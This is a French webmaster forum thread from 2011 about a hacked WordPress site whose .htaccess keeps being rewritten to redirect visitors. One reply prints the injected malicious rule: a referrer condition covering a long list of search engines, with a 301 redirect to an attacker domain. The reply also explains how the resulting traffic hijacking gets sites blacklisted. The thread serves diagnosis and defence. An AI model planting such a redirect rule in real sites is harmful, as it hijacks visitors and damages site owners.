hacking wordpress 3.2.1 avec changement de .htacess

Discussion dans 'Administration d'un site Web' créé par zen la tortue, 27 Novembre 2011.

  1. zen la tortue
    zen la tortue WRInaute occasionnel
    Inscrit:
    10 Septembre 2006
    Messages:
    261
    J'aime reçus:
    0
    bonjour,
    depuis 2 jours mon .htaccess est modifié par rediriger mon site vers une site malveillant .

    j'ai scanné mon site avec plusieurs antivirus en ligne tout est clean
    je ne comprends pas .
    Avez vous une idée ?
    merci
     
  2. JanoLapin
    JanoLapin WRInaute accro
    Inscrit:
    21 Septembre 2008
    Messages:
    4 226
    J'aime reçus:
    0
    vois peut-être du côté de ton hébergeur... cela ne vient peut-être pas de ton site
     
  3. zen la tortue
    zen la tortue WRInaute occasionnel
    Inscrit:
    10 Septembre 2006
    Messages:
    261
    J'aime reçus:
    0

    je suis chez ovh avec un server mutualisé 720 plan
     
  4. padadam22
    padadam22 WRInaute accro
    Inscrit:
    23 Octobre 2010
    Messages:
    3 104
    J'aime reçus:
    0
    Peu importe l'hébergeur ou le service que tu as, tu devrais les contacter pour qu'ils vérifient de leur côté ;)
    La faille vient peut être d'un plugin ou du template que tu utilises.
     
  5. zeb
    zeb WRInaute accro
    Inscrit:
    5 Décembre 2004
    Messages:
    12 021
    J'aime reçus:
    1
    Je serais curieux de savoir comment un antivirus en ligne te permet de savoir si un fichier serveur est infecté.
    Si tu parle de scanner tes fichiers de site en local avec un antivirus en ligne, souvent dédié a la désinfection des PC perso, alors n'espère pas trouver un code qui est destiné a s'attaquer a un serveur web.
     
  6. le-bon-plan.com
    le-bon-plan.com WRInaute discret
    Inscrit:
    1 Juin 2007
    Messages:
    98
    J'aime reçus:
    0
    Il y a une forte probabilité que la faille provienne d'une extension Wordpress.

    Fais des recherches sur le net pour vérifier si certaines extensions que tu utilises n'ont pas de pb de sécurité.

    Exemple de recherche "nom extension + fail xss" ...
     
  7. zeb
    zeb WRInaute accro
    Inscrit:
    5 Décembre 2004
    Messages:
    12 021
    J'aime reçus:
    1
    Et pour info sans citer personne tu n'est pas le seul sur le forum a être victime de cette bouse. La cascade de redirections qui s’enchainait par modification de htaccess tombe maintenant sur des serveurs blacklistés.
     
  8. padadam22
    padadam22 WRInaute accro
    Inscrit:
    23 Octobre 2010
    Messages:
    3 104
    J'aime reçus:
    0
    Zeb, de quelle bouse parles-tu ?
     
  9. zeb
    zeb WRInaute accro
    Inscrit:
    5 Décembre 2004
    Messages:
    12 021
    J'aime reçus:
    1
    J'ai eu l'occasion d'entendre parler et de voir le résultat d'un virus du genre de celui dont il est question ici c'est lui que je nome "bouse" (allusion non déguisée a une partie de la production bovine) :D

    en gros voici le résultat sur un fichier htaccess :

    Code:
    RewriteEngine On
    
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    
    RewriteRule ^(.*)$ -http://4ppics3tting.in/rib4/index.php [R=301,L]
    dans certains cas le fichier htaccess initial est reproduit en dessous.
    Comme tu peux le voir le code en question (ou celui qui le gère) produit une redirection en fonction d'où tu viens vers un domaine (j'ai un peu maquillé le NDD) qui est maintenant blacklisté.
    Le dit domaine opérait une redirection chez un copain à lui qui lui injectait une page pure javascript qui en fonction d'un chiffre (ou un truc dans le genre) te renvoyait ailleurs sur un autre site.
    C'est un pur détournement de trafic en fait.

    La cible qui a vécu (vie encore plus ou moins ça) est maintenant listé "site dangereux" dans GG sur sa requête principale. Et si par le plus grand des hasard tu tente d'y accéder via l'url si tu la connais, Firefox te donne une page d'alerte propre a faire peur au premier lambda venu.

    Bref le pauvre gars a tout perdu en trois jours et il lui reste a identifier l'entrée (si c'est pas déjà fait) et a nettoyer le site après avoir colmaté la faille (ça doit être fait puisqu'il tournait bien cet aprem).

    Ensuite il devra contacter google et tous les sites de blacklistage pour dire "coucou je me suis fait hacker" mais maintenant c'est OK. Je ne te parle pas non plus de l'impact WOT possible (j'ai pas vérifié) où monsieur "Poissonard" (allusion "au bon beurre") va se lacher pour lapider le pauvre site plein de vilains virus (les plus beauf ont la gâchette facile la dessus).
     
  10. padadam22
    padadam22 WRInaute accro
    Inscrit:
    23 Octobre 2010
    Messages:
    3 104
    J'aime reçus:
    0
    Hum... un beau bazar en somme.
     
  11. zeb
    zeb WRInaute accro
    Inscrit:
    5 Décembre 2004
    Messages:
    12 021
    J'aime reçus:
    1
    ouep, autrement dit un gros mer*ier.

    Architecture classique pour ce souci (je supose) : windows / compte admin / fillezila pas en SFTP
     
Chargement...
Similar Threads - hacking wordpress changement Forum Date
wordpress et le hacking Développement d'un site Web ou d'une appli mobile 4 Janvier 2015
Problème hacking Wordpress - fichiers wp-sample.php et wp-admin/wp-user.php Débuter en référencement 30 Avril 2014
Piratage/Hacking - Millions de pages indéxées Problèmes de référencement spécifiques à vos sites 3 Février 2022
Hacking sur la page vue par Google Bot (non WP) Problèmes de référencement spécifiques à vos sites 1 Août 2021
99% arrive sur des pages 404 suite hacking Problèmes de référencement spécifiques à vos sites 15 Décembre 2016
Se former au Growth Hacking? Débuter en référencement 5 Décembre 2016
Hacking du site et redirection vers un autre Problèmes de référencement spécifiques à vos sites 16 Décembre 2011
Hacking sur ma home Administration d'un site Web 23 Novembre 2011
tentative de hacking ou pas ? Administration d'un site Web 10 Janvier 2011
Concours de hacking : l'iPhone, Safari, IE8 et Firefox tombent, Chrome résiste Google : l'entreprise, les sites web, les services 25 Mars 2010
Logiciel ou Script d'analyse Logs Apache / hacking ? Administration d'un site Web 17 Juin 2008
Hacking, oui, mais lequel ? Administration d'un site Web 4 Mai 2008
hacking Administration d'un site Web 14 Mars 2007
Hacking et Spaming Demandes d'avis et de conseils sur vos sites 4 Mars 2007
tentative de hacking sur mon site? Demandes d'avis et de conseils sur vos sites 29 Janvier 2007
que faire pour se protéger après une tentative de hacking ? Administration d'un site Web 15 Octobre 2006
Description et titre dans Google apres Hacking Administration d'un site Web 15 Octobre 2006
Vulnérabilité Google - Un (petit) hacking est possible ! Google : l'entreprise, les sites web, les services 26 Septembre 2006
Tentative de Hacking ou Pas? Administration d'un site Web 12 Septembre 2006
HACKING!!! Administration d'un site Web 12 Août 2006